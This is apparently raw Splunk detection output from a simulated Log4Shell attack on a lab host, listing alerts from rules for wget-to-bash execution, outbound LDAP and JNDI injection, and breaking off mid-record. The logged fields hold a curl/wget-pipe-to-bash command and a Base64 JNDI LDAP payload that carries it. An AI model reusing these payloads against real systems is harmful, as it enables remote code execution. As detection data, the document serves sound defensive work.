annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646654, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="DE.AE", annotations._all="DE.CM", annotations._all="CIS 12", annotations._all="Command and Control", annotations._all="Stage:Initial Access", annotations._all="Source:Endpoint", annotations._all="PR.DS", annotations._all="Actions on Objectives", annotations._all="T1059", annotations._all="Log4Shell CVE-2021-44228", annotations._all="PR.PT", annotations._all="CIS 13", annotations._all="CVE-2021-44228", annotations._all="T1190", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642646651, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 5", annotations._all="Exploitation", annotations._all="CIS 16", annotations._all="CIS 3", annotations._all="Stage:Execution", annotations._all="T1190", annotations._all="DE.CM", annotations._all="Source:Application Log", annotations._all="Reconnaissance", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="10.0.1.21", risk_object_type="system", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642646654, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="DE.AE", annotations._all="DE.CM", annotations._all="CIS 12", annotations._all="Command and Control", annotations._all="Stage:Initial Access", annotations._all="Source:Endpoint", annotations._all="PR.DS", annotations._all="Actions on Objectives", annotations._all="T1059", annotations._all="Log4Shell CVE-2021-44228", annotations._all="PR.PT", annotations._all="CIS 13", annotations._all="CVE-2021-44228", annotations._all="T1190", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642646651, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 5", annotations._all="Exploitation", annotations._all="CIS 16", annotations._all="CIS 3", annotations._all="Stage:Execution", annotations._all="T1190", annotations._all="DE.CM", annotations._all="Source:Application Log", annotations._all="Reconnaissance", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="unknown", risk_object_type="user", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642646616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", 